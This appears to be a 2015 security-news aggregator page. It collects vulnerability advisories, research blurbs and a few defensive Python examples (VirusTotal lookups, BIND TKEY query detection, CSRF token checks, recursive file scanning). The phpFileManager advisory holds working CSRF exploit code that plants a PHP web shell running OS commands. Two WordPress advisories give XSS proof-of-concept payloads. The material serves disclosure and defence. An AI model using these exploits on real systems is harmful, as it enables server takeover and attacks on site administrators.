Channel: BOT24

Angler Exploit Kit Used to Find and Infect PoS Systems

An attack aiming to infect PoS systems was found using the Angler Exploit Kit to push a PoS reconnaissance Trojan. This Trojan, detected as TROJ_RECOLOAD.A, checks for multiple conditions on the infected system, such as whether it is a PoS machine or part of a PoS network. It then proceeds to download specific malware depending on the conditions met. We’ve also found that this attack uses the fileless installation capability of the Angler Exploit Kit to avoid detection.

Looking into its infection chain, we found that part of its reconnaissance involves searching for data related to specific websites and companies. One example would be Verifone, a company that offers solutions for electronic payments and PoS transactions. Based on the infection chain, we also believe that this attack is targeting web-based terminals.

This finding suggests that attackers are now looking for ways to deploy PoS malware on a wider scale. Just recently, we discovered a PoS threat that piggybacks on the established Andromeda botnet to reach PoS systems.

more here....................http://blog.trendmicro.com/trendlabs-security-intelligence/angler-exploit-kit-used-to-find-and-infect-pos-systems/




CROSS DISTRIBUTION EXPLOIT TESTING (INCLUSIVE TESTING Redhat Local Privilege Escalation CVE-2015-3245,3246 and more...)

We were looking for an easy way to test the installation of our tool, Faraday (https://github.com/infobyte/faraday), on different distributions.

We wanted to do this because the installation process is normally one of the most complicated and critical processes of any new tool being implemented. It is important that the process is easy and that everything works without any hiccups so that users can get started using the tool ASAP and don't lose valuable time during installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent "containers" to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines.

The process we developed is pretty simple: we start from a plain list of distributions and, for each one,
We generate a Docker container
We install Faraday
We connect to the container over SSH with X forwarding and run the graphical application (Qt GUI)
If one of these steps doesn't work, we evaluate the cause of the problem and write a corresponding patch to remedy it.

We are using this process daily in our own continuous-integration system.

read on here..................http://blog.infobytesec.com/2015/07/cross-distribution-exploit-testing.html



[OSSA 2015-013] Glance task flow may fail to delete image from backend (CVE-2015-3289)

=====================================================================
OSSA-2015-013: Glance task flow may fail to delete image from backend
=====================================================================

:Date: July 28, 2015
:CVE: CVE-2015-3289


Affects
~~~~~~~
- Glance: versions 2015.1.0


Description
~~~~~~~~~~~
Abhishek Kekane from NTT reported a vulnerability in Glance. By
creating numerous images using the import task flow API and deleting
them, an authenticated attacker may accumulate untracked image data in
the backend resulting in potential resource exhaustion and denial of
service. All glance setups are affected.


Patches
~~~~~~~
- https://review.openstack.org/#/c/181816/ (Kilo)
- https://review.openstack.org/#/c/181345/ (Liberty)


Credits
~~~~~~~
- Abhishek Kekane from NTT (CVE-2015-3289)


References
~~~~~~~~~~
- https://launchpad.net/bugs/1454087
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3289


Notes
~~~~~
- This fix will be included in the future 2015.1.1 (kilo) release.



Guest Diary: Xavier Mertens - Integrating VirusTotal within ELK

Visualisation is key when you need to keep control of what’s happening on networks which carry tons of malicious files daily. virustotal.com is a key player in fighting malware on a daily basis. Not only can you submit and search for samples on their website, but they also provide an API to integrate virustotal.com into your software or scripts. A few days ago, Didier Stevens posted some SANS ISC diaries about the integration of VirusTotal into Microsoft Sysinternals tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfully scanned, you’ll get back interesting results, the best known being the file score in the form “x/y”. The goal of my setup is to integrate virustotal.com within my ELK setup. To feed VirusTotal, hashes of interesting files must be computed. I’m getting interesting hashes via my Suricata IDS, which inspects all the Internet traffic passing through my network.

The first step is to configure the MD5 hashes support in Suricata.

more here....................https://isc.sans.edu/diary/+Guest+Diary%3A+Xavier+Mertens+-+Integrating+VirusTotal+within+ELK/19967
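The hash lookup described above, as an added Python example (not Xavier Mertens' code): read Suricata EVE JSON fileinfo events (which carry an MD5 once md5 hashing is enabled), de-duplicate the hashes, batch them into VirusTotal v2 file/report queries, and reduce each report to the "x/y" score that gets indexed in ELK. The EVE lines and the VirusTotal response are constructed samples; the HTTP call is injected as a function so the block runs offline, and the batch size of four resources per request is assumed here as the public-API limit.

```python
import json
from urllib.parse import urlencode

# Constructed Suricata EVE JSON lines (sample data, not captured traffic).
# With md5 hashing enabled, each fileinfo event carries the file's MD5.
SAMPLE_EVE_LINES = [
    '{"timestamp":"2015-07-28T10:00:01.000000+0200","event_type":"fileinfo","src_ip":"10.0.0.5",'
    '"dest_ip":"203.0.113.7","fileinfo":{"filename":"/download/invoice.exe",'
    '"md5":"d41d8cd98f00b204e9800998ecf8427e","size":0,"state":"CLOSED"}}',
    '{"timestamp":"2015-07-28T10:00:02.000000+0200","event_type":"http","src_ip":"10.0.0.5",'
    '"dest_ip":"203.0.113.7","http":{"hostname":"example.test","url":"/download/invoice.exe"}}',
    '{"timestamp":"2015-07-28T10:00:03.000000+0200","event_type":"fileinfo","src_ip":"10.0.0.6",'
    '"dest_ip":"203.0.113.7","fileinfo":{"filename":"/download/invoice.exe",'
    '"md5":"d41d8cd98f00b204e9800998ecf8427e","size":0,"state":"CLOSED"}}',
    '{"timestamp":"2015-07-28T10:00:04.000000+0200","event_type":"fileinfo","src_ip":"10.0.0.7",'
    '"dest_ip":"198.51.100.9","fileinfo":{"filename":"/img/logo.png",'
    '"md5":"9e107d9d372bb6826bd81d3542a419d6","size":1234,"state":"CLOSED"}}',
    'not json at all',  # a corrupt line must not abort the pipeline
]

VT_REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"

# Constructed stand-in for what the v2 API returns; used instead of a live HTTP call.
FAKE_VT_RESPONSE = [
    {"resource": "d41d8cd98f00b204e9800998ecf8427e", "response_code": 1,
     "positives": 0, "total": 57},
    {"resource": "9e107d9d372bb6826bd81d3542a419d6", "response_code": 0,
     "verbose_msg": "The requested resource is not among the finished, queued or pending scans"},
]


def fake_fetch(url):
    """Offline replacement for an HTTP GET of `url`; a real fetch would return the parsed JSON body."""
    return FAKE_VT_RESPONSE


def extract_md5s(lines):
    """Return the unique MD5s found in EVE fileinfo events, in first-seen order."""
    seen, out = set(), []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue
        if event.get("event_type") != "fileinfo":
            continue
        md5 = event.get("fileinfo", {}).get("md5")
        if md5 and md5 not in seen:
            seen.add(md5)
            out.append(md5)
    return out


def build_report_query(api_key, md5s):
    """file/report accepts a comma-separated 'resource' list, so several hashes cost one call."""
    return VT_REPORT_URL + "?" + urlencode({"apikey": api_key, "resource": ",".join(md5s)})


def score_from_report(report):
    """Reduce a report to the 'x/y' detection score; None when VT has never seen the hash."""
    if report.get("response_code") != 1:
        return None
    return f"{report['positives']}/{report['total']}"


def enrich(lines, api_key, fetch, batch=4):
    """Map each MD5 seen by Suricata to its VT score; `batch` is the assumed public-API limit."""
    md5s = extract_md5s(lines)
    scores = {}
    for i in range(0, len(md5s), batch):
        reports = fetch(build_report_query(api_key, md5s[i:i + batch]))
        if isinstance(reports, dict):  # a single-resource query returns a bare object
            reports = [reports]
        for report in reports:
            scores[report["resource"]] = score_from_report(report)
    return scores
```

In a live setup `fetch` would wrap `urllib.request.urlopen` and the resulting dict would be emitted as a JSON line for Logstash; keeping the network call injectable is also what makes the enrichment step unit-testable.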



Reflected XSS in Flickr Justified Gallery could allow unauthenticated attackers to do almost anything an admin can do (WordPress plugin)

Details
================
Software: Flickr Justified Gallery
Version: 3.3.6
Homepage: https://wordpress.org/plugins/flickr-justified-gallery/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-flickr-justified-gallery-could-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
Reflected XSS in Flickr Justified Gallery could allow unauthenticated attackers to do almost anything an admin can do

Vulnerability
================
This plugin contains a reflected XSS vulnerability which would allow an unauthenticated attacker to do almost anything an admin user can do.
For this to happen, the administrator would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.

Proof of concept
================
Visit a page containing the following in Firefox or any other browser with no reflected XSS mitigation strategies, and click submit:
<form action="http://localhost/wp-admin/options-general.php?page=fjgwpp.php" method="POST">
<input type="text" name="fjgwpp_userID" value=":&quot;>&lt;script>alert(1)&lt;/script>">
<input type="text" name="Submit" value="Save Changes">
<input type="submit">
</form>

Mitigations
================
Upgrade to version 3.4.0 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2015-07-21: Discovered
2015-07-22: Reported to vendor via email
2015-07-22: Requested CVE
2015-07-23: Vendor responded confirming fixed in 3.4.0
2015-07-28: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.



The Avast Series

I spent some time quite a while ago looking into avast! and, after about a year, I am going to post about the issues that were found, and fixed back then. The whole project was pretty fun, avast! offers a lot of functionalities and as such a ton of components to look into. Identifying the security boundaries and attack surface required a decent understanding of the product: services, opened ports, LPC or RPC interfaces, kernel drivers and their IO controls or filters, browser components, various parsers, "self-defense", etc.

A decent number of issues were found, and Igor and the avast! bug bounty team fixed them promptly, and extensively - I think they did a great job at not concentrating on the specific issues submitted but thinking about the bigger picture, variants and remediation.

I will start with one of the juicier ones, as it allowed RCE from a browser here................http://expertmiami.blogspot.com/2015/07/the-avast-series.html



Hardening Android's Bionic libc

This article provides an overview of the security improvements implemented in the CopperheadOS libc. The improvements are available in Copperhead’s Bionic repository on GitHub and a subset of the work has been submitted upstream. The intention is to upstream as much as possible. However, CopperheadOS fills a different niche than vanilla Android so it can make sacrifices to performance, memory usage and compatibility that aren’t suitable in the upstream project.

All of the CopperheadOS repositories are now public on GitHub and an alpha release with pre-built ROMs for the Nexus 5 and Samsung Galaxy S4 will happen in the near future. Build instructions will also be posted soon.

read on here...............https://copperhead.co/2015/07/27/hardening-bionic



CVE-2015-5477: An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure in BIND

A deliberately constructed packet can exploit an error in the handling of queries for TKEY records, permitting denial of service.
Document Version: 2.0
Posting date: 28 July 2015
Program Impacted: BIND
Versions affected: 9.1.0 -> 9.8.x, 9.9.0 -> 9.9.7-P1, 9.10.0 -> 9.10.2-P2
Severity: Critical
Exploitable: Remotely
Description:
An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.
Impact:
Both recursive and authoritative servers are vulnerable to this defect.  Additionally, exposure is not prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.
All versions of BIND 9 from BIND 9.1.0 (inclusive) through BIND 9.9.7-P1 and BIND 9.10.2-P2 are vulnerable.
Operators should take steps to upgrade to a patched version as soon as possible.
CVSS Score:  7.8

CVSS Vector:  (AV:N/AC:L/Au:N/C:N/I:N/A:C)

For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:N/I:N/A:C)
Workarounds:
None.
Active exploits: 
None known.
Solution:  Upgrade to the patched release most closely related to your current version of BIND.  These can be downloaded from http://www.isc.org/downloads.
  • BIND 9 version 9.9.7-P2
  • BIND 9 version 9.10.2-P3
Acknowledgements: ISC would like to thank Jonathan Foote for discovering and disclosing this vulnerability.
Document Revision History:
  • 1.0 Advance Notification - 21 July, 2015
  • 2.0 Public Disclosure - 28 July, 2015
Related Documents:
See our BIND9 Security Vulnerability Matrix at https://kb.isc.org/article/AA-00913 for a complete listing of Security Vulnerabilities and versions affected.
If you'd like more information on ISC Subscription Support and Advance Security Notifications, please visit http://www.isc.org/services
Do you still have questions?  Questions regarding this advisory should go to security-officer@isc.org.  To report a new issue, please encrypt your message using security-officer@isc.org's PGP key which can be found here:https://www.isc.org/downloads/software-support-policy/openpgp-key/.  If you are unable to use encrypted email, you may also report new issues at: https://www.isc.org/community/report-bug/.
Note: ISC patches only currently supported versions. When possible we indicate EOL versions affected.  (For current information on which versions are actively supported, please see http://www.isc.org/downloads/). 
ISC Security Vulnerability Disclosure Policy:  Details of our current security advisory policy and practice can be found here: https://kb.isc.org/article/AA-00861/164/ISC-Software-Defect-and-Security-Vulnerability-Disclosure-Policy.html
This Knowledge Base article https://kb.isc.org/article/AA-01272 is the complete and official security advisory document.
Legal Disclaimer: 
Internet Systems Consortium (ISC) is providing this notice on an "AS IS" basis. No warranty or guarantee of any kind is expressed in this notice and none should be implied. ISC expressly excludes and disclaims any warranties regarding this notice or materials referred to in this notice, including, without limitation, any implied warranty of merchantability, fitness for a particular purpose, absence of hidden defects, or of non-infringement. Your use or reliance on this notice or materials referred to in this notice is at your own risk. ISC may change this notice at any time.  A stand-alone copy or paraphrase of the text of this document that omits the document URL is an uncontrolled copy. Uncontrolled copies may lack important information, be out of date, or contain factual errors.
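The advisory notes that ACLs and configuration options do not help because the defect sits before those checks, so the useful compensating control while patching is at the network edge: know which clients send TKEY queries at all, and rate-limit or drop them there. The Python below is an added illustration, not ISC code. It parses the DNS header and question section of a UDP payload and flags TKEY (type 249) queries; the sample packets are constructed inline by a small builder.

```python
import struct

TKEY = 249  # RFC 2930 TKEY meta-RR type
QTYPE_NAMES = {1: "A", 28: "AAAA", 249: "TKEY", 250: "TSIG"}


def parse_name(buf, off):
    """Read an uncompressed domain name starting at buf[off]; return (name, next offset)."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("truncated name")
        length = buf[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            # Compression pointers are legal in answers but unexpected in a question name.
            raise ValueError("compression pointer in question name")
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) or ".", off


def parse_query(packet):
    """Parse the DNS header and question section: enough to classify a query by QTYPE."""
    if len(packet) < 12:
        raise ValueError("short DNS header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", packet[:12])
    off = 12
    questions = []
    for _ in range(qdcount):
        name, off = parse_name(packet, off)
        if off + 4 > len(packet):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions}


def is_tkey_query(packet):
    """True for a query (QR=0) whose question section asks for TKEY."""
    parsed = parse_query(packet)
    return not parsed["is_response"] and any(qtype == TKEY for _, qtype, _ in parsed["questions"])


def describe(packet):
    """Human-readable 'name TYPE' strings, one per question, for an alert line."""
    parsed = parse_query(packet)
    return [f"{name} {QTYPE_NAMES.get(qtype, qtype)}" for name, qtype, _ in parsed["questions"]]


def build_query(name, qtype, txid=0x1234):
    """Constructed sample packet (standard query, RD set, one question); not BIND code."""
    out = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    for label in [part for part in name.strip(".").split(".") if part]:
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00" + struct.pack("!HH", qtype, 1)
```

Fed from a packet capture or a UDP socket bound beside the resolver, `is_tkey_query` gives a per-source count of TKEY traffic; legitimate TKEY use (GSS-TSIG dynamic updates) comes from a known, short list of clients, so anything else is worth an alert until the patched release is in place.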


Debugging Apps on Android Emulator Using GDB

This article shows how to debug a process running on a rooted Android device or emulator. Debugging a process is an essential task for finding memory-corruption-style vulnerabilities in an application.

Prerequisites to follow the steps:

Set up an Android Emulator
NDK – This can be downloaded from the link below
http://developer.android.com/tools/sdk/ndk/index.html

What are we going to do here?

In simple steps, this is what we are going to do:

Set up GDB Server on the emulator
Connect to the GDB server from the client
Start debugging

Let’s begin here.................http://resources.infosecinstitute.com/android-hacking-and-security-part-20-debugging-apps-on-android-emulator-using-gdb/



Paper: Forensic Analysis of WhatsApp Messenger on Android Smartphones

We present the forensic analysis of the artifacts left on Android devices by WhatsApp Messenger, the client of the WhatsApp instant messaging system. We provide a complete description of all the artifacts generated by WhatsApp Messenger, we discuss the decoding and the interpretation of each one of them, and we show how they can be correlated together to infer various types of information that cannot be obtained by considering each one of them in isolation.
By using the results discussed in this paper, an analyst will be able to reconstruct the list of contacts and the chronology of the messages that have been exchanged by users. Furthermore, thanks to the correlation of multiple artifacts, (s)he will be able to infer information like when a specific contact has been added, to recover deleted contacts and their time of deletion, to determine which messages have been deleted, when these messages have been exchanged, and the users that exchanged them.

more here..............................http://arxiv.org/pdf/1507.07739v1.pdf




Paper: Comparison between security majors in virtual machine and linux containers

Virtualization started to gain traction in the domain of information technology in the early 2000s when managing resource distribution was becoming an uphill task for developers. As a result, tools like VMWare and Hyper V (hypervisor) started making inroads into the software repository on different operating systems. VMWare and Hyper V could support multiple virtual machines running on them, each having its own isolated environment. Due to this isolation, the security aspects of virtual machines (VMs) did not differ much from those of physical machines (having a dedicated operating system on hardware). The advancement made in the domain of Linux containers (LXC) has taken virtualization to an altogether different level where resource utilization by various applications has been further optimized. But container security has assumed primary importance amongst researchers today, and this paper is inclined towards providing a brief overview of comparisons between the security of containers and VMs.

more here..............................http://arxiv.org/ftp/arxiv/papers/1507/1507.07816.pdf





PHP FileManager v0.9.8 CSRF Backdoor Shell

[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt



Vendor:
================================
phpfm.sourceforge.net



Product:
============================
phpFileManager version 0.9.8


Vulnerability Type:
==========================
CSRF Remote Backdoor Shell



CVE Reference:
==============
N/A



Advisory Information:
========================================
CSRF Remote Backdoor Shell Vulnerability




Vulnerability Details:
=======================================================================
PHP File Manager is vulnerable to creation of arbitrary files on the server
via CSRF, which an attacker can use to create remote backdoor shell access if the victim
clicks a malicious link or visits a malicious webpage.

To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php
2- inject code and save to the backdoor we just created

e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]


Exploit code(s):
===============

<script>
var scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)

var maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
blasphemer(maliciouso)

function blasphemer(payload){
var xhr=new XMLHttpRequest()
xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
xhr.send(payload)
}
</script>



Disclosure Timeline:
=========================================================


Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s): [+] POST


Vulnerable Product: [+] phpFileManager 0.9.8


Vulnerable Parameter(s): [+] action, cmd_arg, file_data, chmod_arg, save_file


Affected Area(s): [+] Web Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


by hyp3rlinx
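A server-side check that would have stopped the forged requests in the script above, as an added Python example (not phpFileManager code; the request dicts are constructed and the hostnames are placeholders): state-changing requests must carry a token bound to the session and an Origin or Referer that matches the site, neither of which a page on another origin can supply. The browser still attaches the victim's cookies to the cross-site POST, which is why a cookie alone is no proof of intent.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "https://localhost"          # the application's own scheme://host[:port]
SERVER_SECRET = b"constructed-server-side-secret"  # would come from config, never sent to clients


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Session-bound token: HMAC(secret, session_id). Embed it in every form that changes state."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def request_is_trusted(request, secret=SERVER_SECRET):
    """Accept a state-changing request only if it passes both the origin and the token check."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True  # must be side-effect free by design; not covered by this check
    headers = request["headers"]
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False
    token = request["form"].get("csrf_token")
    session_id = request["cookies"].get("session")
    if not token or not session_id:
        return False
    # Constant-time compare so the token cannot be guessed byte by byte.
    return hmac.compare_digest(token, issue_csrf_token(session_id, secret))


# Constructed request as the server would see the cross-site XMLHttpRequest from the advisory:
# a simple form POST, so the browser adds the Origin header and the victim's cookies.
FORGED_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "https://attacker.invalid",
                "Content-Type": "application/x-www-form-urlencoded"},
    "cookies": {"session": "s3ss10n"},
    "form": {"frame": "3", "action": "2", "dir_dest": "2", "cmd_arg": "666.php"},
}


def legitimate_request(secret=SERVER_SECRET):
    """Constructed same-origin request carrying the token the server issued for this session."""
    return {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN,
                    "Content-Type": "application/x-www-form-urlencoded"},
        "cookies": {"session": "s3ss10n"},
        "form": {"action": "2", "cmd_arg": "notes.txt",
                 "csrf_token": issue_csrf_token("s3ss10n", secret)},
    }


def same_origin_without_token():
    """Constructed request with the right Origin but no token: still rejected."""
    req = legitimate_request()
    req["form"] = {k: v for k, v in req["form"].items() if k != "csrf_token"}
    return req
```

Either check alone would block the advisory's script; requiring both means a future reflected XSS in the same origin (which could read the token) and a client that strips Origin/Referer each have one more hurdle rather than a free pass.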



MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played, and monitor the system for potential issues (i.e. system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism.

more here.............................https://github.com/fuzzing/MFFA



Laika BOSS: Object Scanning System

Laika is an object scanner and intrusion detection system that strives to achieve the following goals:

Scalable
Work across multiple systems
High volume of input from many sources
Flexible
Modular architecture
Highly configurable dispatching and dispositioning logic
Tactical code insertion (without needing restart)
Verbose
Generate more metadata than you know what to do with

Each scan does three main actions on each object:

Explode children

Some objects are archives, some are wrappers, and others are obfuscators. Whatever the case may be, find children objects that should be scanned recursively by exploding them out.

Mark flags

Flags provide a means for dispositioning objects and for pivoting on future analysis.

Add metadata

Discover as much information describing the object for future analysis.

More information here including white paper from Lockheed Martin.......................https://github.com/lmco/laikaboss
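The three actions described above (explode children, mark flags, add metadata), shown as a small recursive scanner in Python. This is an added illustration and not Laika BOSS code: Laika drives dispatching through YARA and a module system, whereas this sketch uses fixed magic-byte signatures and only knows how to explode zip containers. The nested zip it scans is built in memory as sample input.

```python
import hashlib
import io
import zipfile

# Minimal magic-byte signatures standing in for YARA-driven dispatch.
MAGIC_FLAGS = [(b"MZ", "pe_header"), (b"%PDF", "pdf_header"), (b"PK\x03\x04", "zip_container")]
MAX_CHILD_BYTES = 10 * 1024 * 1024  # refuse to inflate oversized children (zip-bomb guard)


def explode(data):
    """Yield (name, bytes) children of a zip container; other object types have no children here."""
    if not data.startswith(b"PK\x03\x04"):
        return
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if info.is_dir() or info.file_size > MAX_CHILD_BYTES:
                    continue
                yield info.filename, archive.read(info)
    except zipfile.BadZipFile:
        return  # looked like a zip, was not one: leave it as a leaf object


def scan(data, name="root", depth=0, max_depth=5):
    """Scan one object: record metadata, mark flags, then recurse into exploded children."""
    result = {
        "name": name,
        "metadata": {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()},
        "flags": [flag for magic, flag in MAGIC_FLAGS if data.startswith(magic)],
        "children": [],
    }
    if depth >= max_depth:
        result["flags"].append("max_depth_reached")  # bounded recursion for nested archives
        return result
    for child_name, child_data in explode(data):
        child = scan(child_data, f"{name}/{child_name}", depth + 1, max_depth)
        result["children"].append(child)
        # A flag on the parent derived from a child's flag: this is the "pivot" Laika describes.
        if "pe_header" in child["flags"] and "exe_in_archive" not in result["flags"]:
            result["flags"].append("exe_in_archive")
    return result


def all_flags(result):
    """Collect the flags of an object and all its descendants for dispositioning."""
    flags = set(result["flags"])
    for child in result["children"]:
        flags |= all_flags(child)
    return flags


def build_sample():
    """Constructed input: a zip that contains a text file and another zip holding a fake PE."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as archive:
        archive.writestr("payload.exe", b"MZ" + b"\x90" * 64)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as archive:
        archive.writestr("readme.txt", b"nothing to see here")
        archive.writestr("inner.zip", inner.getvalue())
    return outer.getvalue()
```

The per-object dict is the shape that would be serialised as the scan's JSON output; the `exe_in_archive` flag only exists because the scanner exploded the inner zip first, which is the point of recursing before dispositioning.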




Trend Micro Discovers Vulnerability That Renders Android Devices Silent

We have discovered a vulnerability in Android that can render a phone apparently dead – silent, unable to make calls, with a lifeless screen. This vulnerability is present from Android 4.3 (Jelly Bean) up to the current version, Android 5.1.1 (Lollipop). Combined, these versions account for more than half of Android devices in use today. No patch has been issued in the Android Open Source Project (AOSP) code by the Android Engineering Team to fix this vulnerability since we reported it in late May.

This vulnerability can be exploited in two ways: either via a malicious app installed on the device, or through a specially-crafted web site. The first technique can cause long-term effects to the device: an app with an embedded MKV file that registers itself to auto-start whenever the device boots would cause the OS to crash every time it is turned on.

In some ways, this vulnerability is similar to the recently discovered Stagefright vulnerability. Both vulnerabilities are triggered when Android handles media files, although the way these files reach the user differs.

more here...............http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-vulnerability-that-renders-android-devices-silent/




Cobalt Strike 2.5 – Advanced Pivoting (Video Included)

I spend a lot of my red time in the Access Manager role. This is the person on a red team who manages callbacks for the red cell. Sometimes, I like to grab a Beacon and drive around a network. It’s important to get out once in a while and enjoy what’s there. Cobalt Strike 2.5 is all about cruising around networks.

Lateral Movement++
This release adds native lateral movement options to Beacon. Use the psexec_psh, winrm, and wmi commands to deliver a Beacon to a target using PowerShell to avoid touching disk.


more here................http://blog.cobaltstrike.com/2015/07/29/cobalt-strike-2-5-advanced-pivoting/



Unveiling Nuclear EK (IV)

In the previous post we managed to obtain the original SWF, but discovered that the exploit is embedded in a ByteArray. Will we be able to obtain it?

First of all, we must extract the contents stored in the ByteArray. To do this, we need a desktop Flash decompiler: Adobe SWF Investigator (it's free!). Once installed, we open the last file obtained: uncompressed_exploit.swf. We go to "Tag Viewer" and select "DefineBinaryData" among all the tags. Then we save it by clicking "Dump to file" and naming it "dump_exploit.bin", for example.


read on here.............http://www.securityartwork.es/2015/07/29/unveiling-nuclear-ek-iv/

Cross-Site Scripting (XSS) in qTranslate WordPress Plugin

Advisory ID: HTB23265
Product: qTranslate WordPress plugin
Vendor: Qian Qin
Vulnerable Version(s): 2.5.39  and probably prior
Tested Version: 2.5.39
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015
Public Disclosure: July 29, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-5535
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the qTranslate WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application, if the victim visits a malicious page with the XSS exploit. This vulnerability can also be used to perform drive-by-download or phishing attacks against website administrators.

Input passed via "edit" HTTP GET parameter to "/wp-admin/options-general.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

A simple exploit below will display a JS popup with "ImmuniWeb" word:

http://wordpress/wp-admin/options-general.php?page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2Fscript%3E


-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-07-01 Vendor notified via email, no reply.
2015-07-10 Vendor notified via emails and support thread on the WordPress plugin page, no reply.
2015-07-17 Vendor notified  via emails, no reply.
2015-07-28 Fix requested via emails, no reply.
2015-07-29 Public disclosure.

Currently we are not aware of any official solution from the vendor. As a temporary solution we strongly recommend
disabling the vulnerable plugin.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23265 - https://www.htbridge.com/advisory/HTB23265 - Cross-Site Scripting (XSS) in qTranslate WordPress Plugin.
[2] qTranslate WordPress plugin - http://www.qianqin.de/ - qTranslate makes creation of multilingual content as easy as working with a single language.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.




Sudo

